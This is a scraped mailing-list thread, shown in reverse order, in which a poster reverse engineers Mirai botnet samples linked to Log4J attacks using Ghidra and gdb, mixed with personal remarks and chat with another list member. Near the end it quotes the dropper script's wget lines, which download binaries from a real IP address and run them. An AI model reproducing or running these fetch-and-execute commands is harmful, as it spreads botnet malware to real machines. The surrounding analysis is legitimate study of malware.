making sure to share these relations
On Tue, Dec 14, 2021, 9:16 AM Karl wrote:
> On 12/14/21, wrote:
> >
> >> What brought you to message me? have you received other posts i've
> made?
> >
> > I am getting your messages through the cypherpunk email list. I think
> > they are pretty
making sure to share these relations
On Tue, Dec 14, 2021, 9:12 AM wrote:
>
> > What brought you to message me? have you received other posts i've made?
>
> I am getting your messages through the cypherpunk email list. I think
> they are pretty entertaining to read so I thought I would message
making sure I share these relations
On Tue, Dec 14, 2021, 8:59 AM Karl wrote:
> > Sorry to hear that. I'm sure you're gonna make it nonetheless!
>
> What brought you to message me? have you received other posts i've made?
>
> >> Long ago, security was all about reverse engineering.
> >
> >
making sure I share these relations
On Tue, Dec 14, 2021, 8:45 AM wrote:
> On 12/14/2021 2:19 PM, Karl wrote:
> > I've been homeless and crazy for years, spasms and visions rather than
> > doing things I desire to do. When I saw this malware and started
> > posting looking at it from my mobile
making sure I share these relations
On Tue, Dec 14, 2021, 8:19 AM Karl wrote:
> On 12/14/21, wrote:
> > Thanks for the information!
> > I'm sure there are communities and tools for reverse engineering
> > programs (i.e. malware).
> > Why do you need a task to work on? Reverse engineering
making sure I share these relations
On Tue, Dec 14, 2021, 8:14 AM wrote:
> Thanks for the information!
> I'm sure there are communities and tools for reverse engineering
> programs (i.e. malware).
> Why do you need a task to work on? Reverse engineering malware sounds
> like a good task to me.
>
making sure I share these relations
On Tue, Dec 14, 2021, 8:09 AM Karl wrote:
> I'm looking at these binaries!
>
> https://bafybeibfppl57sszyk733lswextgmkbu2aaysboldqtibu5capjxgwrw7y.ipfs.dweb.link/
> and elsewhere. I don't really know what they do.
>
> I've reversed a little code before but
making sure I share these relations
On Tue, Dec 14, 2021, 7:59 AM wrote:
> Hi K,
>
> do I understand it correctly that you are trying to reverse engineer
> some malware? Did you have experience with it before starting to work on
> this particular malware?
> I find the topic quite interesting...
it was pleasant to add those bits
we'll see whether and how this continues
i have appointments and things today now
> 08048169 83 e4 f0ANDESP,0xfff0
>
> $ecx is $esp before being aligned to 16 bytes.
0xfff0 would be 8 bytes i suppose, not 16
param_2 is edx which is 0
that's the first three pushed values
then the function pointers, two of them
ecx here is 0xc944. I type `p *$ecx` into gdb and see it's a
valid dereferencable pointer. wonder where this came from.
glancing up at the entrypoint assembly
08048167 89 e1
i type 'run' into gdb to restart from the entrypoint
param_1 is eax which is 0
esp=>local_8 is just plain esp.
Here's where the entrypoint hands off control. It pushes function
addresses and registers.
It's rare for function addresses to be passed to other functions in
mainstream code.
In gdb, we can see what values all these parameters and registers have.
0804816c 50 PUSH
The first thing I notice here is that the function takes a _lot_ of
parameters. This is more poignant because it makes the assembly
complex, but back in the entrypoint we saw what values were passed for
each one of these parameters.
**
so let's go back to ghidra, which probably has a debugger of its own
even somewhere, and guess what this function will be doing before we
step further through it.
here it is after 'si'.
something to remember when doing this is that it is a very old
practice for binaries like this to detect whether or not they are
being run in a conventional debugger. so this approach can only get
you so far (and is very risky).
┌─Register group:
here i've repeatedly typed 'ni' to move it to the function call that
initiates the mysterious behavior of the malware. you don't have to
type 'ni' over and over again, gdb will assume you meant to type the
same thing again if you just hit 'enter'.
here, we don't want to type 'ni'. we'll type
here it is skinny enough to see
i don't usually use these views but they're fastest to find people
reminding you of the commands to enable online ('layout asm', 'layout
regs')
up at the top are the registers of the process. the 'working memory'.
they're lowercase now, instead of uppercase.
then
this is what a gdb reg/asm layout looks like when copy-pasted into an email
┌─Register group:
general┐
│eax0x0 0
│
│ecx0x0 0
│
I found this command from the web:
(gdb) info file
Symbols from "/media/3/pkg/ghidra-projects/Log4J
Malware/Mirai/776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00".
Local exec file:
`/media/3/pkg/ghidra-projects/Log4J
people always say you should push your edge, challenge your fears!
i'll be running it with a debugger so that it doesn't go too far.
if you aren't a crazed homeless software developer, you'll want to
have a vm or a dedicated offline system for something like this.
$ gdb
i'm destabilising here.
sounds like you want a quick summary of these binaries. a researcher
for an antivirus group would likely have that. i'm not one, so i'm a
lot slower. i really enjoy this work, it's very rare for me to be
able to do something like this.
i'm just gonna run the binary. i bet that idea is part of some of my fears.
on with FUN_0804d23f !
we could skip all the details and try to profile more attributes of
the binaries.
The function called from the entrypoint is FUN_0804d23f . It's bigger.
i'm seeing that pattern, with the skipped code calling a void pointer,
elsewhere in the code.
for something confusing like that, it's clearest to watch the system
execute to see what is important. so it would make sense to move to
code that i can run. this function is passed as a pointer in the
// dereference the pointer and move the discovered value into EDX.
// ghidra here is reminding us that PTR_DAT_0804e024 in EAX points to
DAT_0804e00c
// and if one of those values is renamed in the interface, it will
update the name everywhere
080480e0 8b 10 MOVEDX,dword
There are a handful of different ways to notate assembly code.
Luckily, I stumbled on what appears to be the same one.
https://www.cs.virginia.edu/~evans/cs216/guides/x86.html#memory
Some examples of mov instructions using address computations are:
mov eax, [ebx] ; Move the 4 bytes in memory at
// call EDX as a function. EDX is the 4th 32-bit register, i.e. cpu
working-memory.
080480d9 ff d2 CALL EDX
// this is where the jump statement from 080480cd ends up. So, this
is the start of the while loop, and the code immediately above isn't
executed until this is.
// this next line is 080480d1 . this line is jumped to (referenced
XREF (j)) from 080480e4
LAB_080480d1
XREF[1]: 080480e4(j)
// add 4 to the first active value (EAX is the first 32-bit register,
the working memory of a cpu)
080480d1 83 c0 04
so let's go through that chunk by chunk
// function prolog, set up a C-style function
080480c0 55 PUSH EBP
080480c1 89 e5 MOVEBP,ESP
080480c3 83 ec 08SUBESP,0x8
// compare the flag with 0 (false)
080480c6 80 3d
I'm looking at this autogenerated ghidra decompilation. I labeled the
flag as a bool. PTR_DAT_0804e024 contains the address of DAT_0804e00c
which contains void at start.
The logic here is a little confusing. I'm trying to put comments inline below.
void FUN_080480c0(void)
{
code *pcVar1;
i wrote a lot more and my system froze quite thoroughly and i rebooted it
> while over them and end up hitting 'F' to reanalyse them as functions.
in ida pro one hits 'P' to do this
I didn't end up including comments.
the LAB_* references pushed onto the stack (to be passed to
FUN_0804d23f) are function pointers. I click on them or hit enter
while over them and end up hitting 'F' to reanalyse them as functions.
I can tell they are functions because the instructions at their
fork situation resolved
i've loaded the mirai binary into the ghidra analyser.
Here's how ghidra displays the mirai entrypoint. Comments from me are
preceded by "//" inline.
**
*
*
i found where i had ghidra downloaded, and booted it up again.
i'd like to find the entrypoint to the mirai binary
i have a fork in a food container that has shattered. i'll leave this
system to replace it. i don't want to accidentally eat a fork
fragment in food in the container in a few days
Mirai/776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00
ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),
statically linked, stripped
Mirai/3f6120ca0ff7cf6389ce392d4018a5e40b131a083b071187bf54c900e2edad26.sh
ASCII shell script, with CRLF line terminators, indicating
this was incredibly helpful for me. working with this malware.
i am just going to go back to it and poke around.
most of the log here is missing. my computer and me both had some issues.
kay my system somehow already has torch installed
guess i built it and forgot!
oooh it has errors when launched
__time for a virtualenv using an old version of python__
python releases are at https://www.python.org/downloads/
i have 3.10 . there's no torch binary. installing 3.9
hum
lots of writing lost
terminal crashed
nice opportunity here to look into finetuning T5 to do automated decompilation
more crazy stuff!
also this situation sucks and is ridiculous, obviously
nonetheless! human workers are crucial and if we let ourselves know
that there is no purpose to doing more work than we feel like in the
first place because it just produces more, we might get confused!
anyway i am working on moving forward on a maintenance step for an
airgapped system i'm
oh! to defuse the bomb? yeah you could totally mutate a virus to plug
the hole. i'm not the best person to do that, but i guess i could
pursue it a little.
the drone hive would like a word, though:
- it is much more efficient to train a language model to do this, than
to find random hackers on
executive summary:
it takes a few days for somebody to analyse an unknown binary, and it
is much easier if they are set up to do so and have significant
experience.
we also have the technology nowadays to do it automatically using
what's called AI but is more just a bunch of matrices. i'm kind
0631
i'm on my truck laptop! i'm kinda freaking out a bit, but being able
to stand up was great.
i'm not set up for reverse engineering, and i only have two systems
with large displays for extensive work like that if done manually.
this is one of them. the other is [airgapped] but not set up
$ tr -dc 0123456789abcdef
my phone is aarch64 so this is a small stumbling block
websearching found this article on reverse engineering go binaries using
ghidra: https://cujo.com/reverse-engineering-go-binaries-with-ghidra/
dunno if it's any good, but it's fun to try to install ghidra on my phone!
maybe check for strings
~/.../l4j2/Log4J Malware $ file
Mirai/776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00
Mirai/776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00: ELF
32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked,
stripped
~/.../l4j2/Log4J Malware $ file
$ less
Mirai/3f6120ca0ff7cf6389ce392d4018a5e40b131a083b071187bf54c900e2edad26.sh
18% 0519
wget http://62.210.130.250/web/admin/x86;chmod +x x86;./x86 x86;
wget http://62.210.130.250/web/admin/x86_g;chmod +x x86_g;./x86_g x86_g;
wget http://62.210.130.250/web/admin/x86_64;chmod +x x86_64;./x86_g
I found some log4j malware! Somebody sent it to an old disrupted hacker
list.
Log4J Malware/
Log4J Malware/Mirai/
Log4J
Malware/Mirai/3f6120ca0ff7cf6389ce392d4018a5e40b131a083b071187bf54c900e2edad26.sh
Log4J
Malware/Mirai/776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00
Log4J
53 matches
Mail list logo
